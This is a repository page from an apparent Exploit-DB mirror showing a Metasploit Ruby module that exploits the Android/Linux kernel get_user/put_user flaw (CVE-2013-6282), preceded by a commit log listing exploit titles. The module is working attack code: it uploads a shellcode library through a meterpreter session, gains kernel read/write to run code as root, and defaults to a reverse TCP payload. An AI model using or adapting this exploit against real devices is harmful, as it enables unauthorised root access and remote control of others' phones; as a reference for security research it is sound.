bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/android/local/40975.rb
Offensive Security 9f1fdff37d DB: 2016-12-30 
6 new exploits

VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)
VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)

SilverSHielD 1.0.2.34 - (opendir) Denial of Service
SilverSHielD 1.0.2.34 - Denial of Service

Android - get_user/put_user Exploit (Metasploit)

LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion
LoudBlog 0.4 - Arbitrary Remote File Inclusion

MyEvent 1.3 - (myevent_path) Remote File Inclusion
MyEvent 1.3 - 'event.php' Remote File Inclusion

LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure
LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure

yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion
Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion

PHP Easy Downloader 1.5 - (save.php) Remote Code Execution
PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution

Ip Reg 0.3 - Multiple SQL Injections
IP Reg 0.3 - Multiple SQL Injections

AstroSPACES - 'id' SQL Injection
AstroSPACES 1.1.1 - 'id' Parameter SQL Injection

myEvent 1.6 - (viewevent.php) SQL Injection
myEvent 1.6 - 'eventdate' Parameter SQL Injection

Mosaic Commerce - 'category.php cid' SQL Injection
Mosaic Commerce - 'cid' Parameter SQL Injection
PokerMax Poker League - Insecure Cookie Handling
Kure 0.6.3 - (index.php post & doc) Local File Inclusion
PokerMax Poker League 0.13 - Insecure Cookie Handling
Kure 0.6.3 - 'index.php' Local File Inclusion

PHP Easy Downloader 1.5 - (file) File Disclosure
PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure

Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion
Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion

XOOPS Module GesGaleri - (kategorino) SQL Injection
XOOPS Module GesGaleri - SQL Injection

zeeproperty - 'adid' SQL Injection
zeeproperty - 'adid' Parameter SQL Injection
Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion
yappa-ng 2.3.3-beta0 - (album) Local File Inclusion
Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion
Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion
WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection
e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection
Joomla! Component ds-syndicate - (feed_id) SQL Injection
XOOPS Module makale - SQL Injection
WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection
e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection
Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection
XOOPS Module makale 0.26 - SQL Injection
ShopMaker 1.0 - (product.php id) SQL Injection
Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection
ShopMaker CMS 1.0 - 'id' Parameter SQL Injection
Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection
phpcrs 2.06 - (importFunction) Local File Inclusion
LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection
phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion
LoudBlog 0.8.0a - 'ajax.php' SQL Injection

YDC - 'kdlist.php cat' SQL Injection
YDC - 'cat' Parameter SQL Injection

txtshop 1.0b (Windows) - 'Language' Local File Inclusion
txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion

MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection
MindDezign Photo Gallery 2.2 - SQL Injection

websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution
WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution

Aj RSS Reader - 'EditUrl.php url' SQL Injection
Aj RSS Reader - 'url' Parameter SQL Injection
WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection
SFS Ez Forum - 'forum.php id' SQL Injection
WordPress Plugin Media Holder - SQL Injection
SFS Ez Forum - SQL Injection

e107 Plugin EasyShop - (category_id) Blind SQL Injection
e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection

Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection
Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection

CafeEngine - 'index.php catid' SQL Injection
CafeEngine - 'catid' Parameter SQL Injection

shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion
ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion

CafeEngine CMS 2.3 - SQL Injection
CafeEngine 2.3 - SQL Injection
Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion
Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting
Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion
Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting

LoudBlog 0.41 - podcast.php id Parameter SQL Injection
LoudBlog 0.41 - 'podcast.php' SQL Injection

LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access
LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access

Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion
Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion

myEvent 1.2/1.3 - Myevent.php Remote File Inclusion
myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion
Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting
yappa-ng - 'index.php' album Parameter Cross-Site Scripting
yappa-ng - Query String Cross-Site Scripting
Yappa-ng - 'index.php' album Parameter Cross-Site Scripting
Yappa-ng - Query String Cross-Site Scripting

tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting
tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting
tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting
tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing
tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing
tinybrowser - 'type' Parameter Cross-Site Scripting
tinybrowser - 'tinybrowser.php' Directory Listing
tinybrowser - 'edit.php' Directory Listing
Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection
PHPMailer < 5.2.18 - Remote Code Execution (Python)
WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload
Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection
Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery
2016-12-30 05:01:19 +00:00

81 lines
3 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "Android get_user/put_user Exploit",
'Description' => %q{
This module exploits a missing check in the get_user and put_user API functions
in the linux kernel before 3.5.5. The missing checks on these functions
allow an unprivileged user to read and write kernel memory.
This exploit first reads the kernel memory to identify the commit_creds and
ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
The exploit was first discovered in the wild in the vroot rooting application.
},
'License' => MSF_LICENSE,
'Author' => [
'fi01', # libget_user_exploit / libput_user_exploit
'cubeundcube', # kallsyms_in_memory
'timwr', # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6282' ],
[ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
[ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
[ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
],
'DisclosureDate' => "Sep 06 2013",
'SessionTypes' => [ 'meterpreter' ],
"Platform" => [ "android", "linux" ],
'Targets' => [[ 'Automatic', { }]],
'Payload' => { 'Space' => 2048, },
'DefaultOptions' =>
{
'WfsDelay' => 120,
'PAYLOAD' => 'linux/armle/mettle/reverse_tcp',
},
'DefaultTarget' => 0,
}
))
end
def exploit
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
exploit_data = File.read(local_file, {:mode => 'rb'})
space = payload_space
payload_encoded = payload.encoded
# Substitute the exploit shellcode with our own
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
workingdir = session.fs.dir.getwd
remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
write_file(remote_file, exploit_data)
print_status("Loading exploit library #{remote_file}")
session.core.load_library(
'LibraryFilePath' => local_file,
'TargetFilePath' => remote_file,
'UploadLibrary' => false,
'Extension' => false,
'SaveToDisk' => false
)
print_status("Loaded library #{remote_file}, deleting")
session.fs.file.rm(remote_file)
print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
end
end
Reference in a new issue View git blame Copy permalink